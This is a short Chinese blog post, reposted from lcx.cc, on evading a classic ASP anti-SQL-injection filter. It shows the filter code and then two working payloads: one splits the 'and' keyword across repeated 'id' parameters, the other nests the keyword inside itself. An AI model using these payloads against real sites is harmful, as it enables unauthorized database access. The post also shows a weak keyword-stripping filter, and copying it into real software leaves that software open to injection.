id = request("id")
id = replace(id, "and", "")
…………//过滤其它的危险关键字
id = replace(id, " ", "")
id = replace(id, ",", "") //过滤空格和逗号,这是使用本方法必须的条件
%>
你还有办法注入吗?以打碎关键字“and”为例,咱们可以这样:
test.asp?id=127%20&id=an&id=d%201=1
原理很简单,如果你提交 test.asp?id=1&id=2&id=3 时,Asp 接收到的结果是:1, 2, 3,注意中间的空格。
php 的无效,直接覆盖了,其它的没测试。
本文所设计的使用条件比较苛刻,需要过滤逗号和空格,但我估计存在这种问题的站点依然不少。
也可以这样写:
https://lcx.cc/index.asp?id=1
https://lcx.cc/index.asp?id=(1)anandd(1=1)
文章来源于lcx.cc:ASP 绕过防注入的新思路:打碎关键字
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论